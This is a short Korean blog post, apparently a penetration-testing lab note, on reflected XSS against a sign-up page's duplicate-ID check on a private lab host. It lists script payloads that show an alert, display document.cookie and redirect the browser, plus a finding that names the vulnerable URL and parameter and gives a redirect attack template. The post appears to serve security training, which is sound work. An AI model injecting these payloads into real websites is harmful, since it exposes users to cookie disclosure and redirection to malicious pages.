Linux/모의해킹

reflected XSS

GGkeeper 2022. 1. 21. 21:56

실습> reflected XSS
반사된 XSS

서버에 전송되는 변수에 저장하고 전송한다.

회원가입 -> 중복확인


<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
<script>location.href="https://naver.com";</script>

 


취약점 종류 : Reflected XSS
취약한 URL : http://192.168.108.101/useridcheck.html?useridcheck=1&userid=<script>location.href="https://naver.com"</script>
취약한 파라미터 : userid
공격 코드 : <script>location.href="악성URL";</script>

 

'Linux > 모의해킹' 카테고리의 다른 글

Adobe Acrobat Reader(pdf) 취약점을 이용한 침투  (0) 2022.01.25
XSS 취약점 찾기  (0) 2022.01.25
stored XSS  (0) 2022.01.21
XSS 이용한 쿠키값 탈취  (0) 2022.01.21
웹 세션 Hijacking  (0) 2022.01.21

'Linux/모의해킹'의 다른글

  • 현재글reflected XSS

관련글

티스토리툴바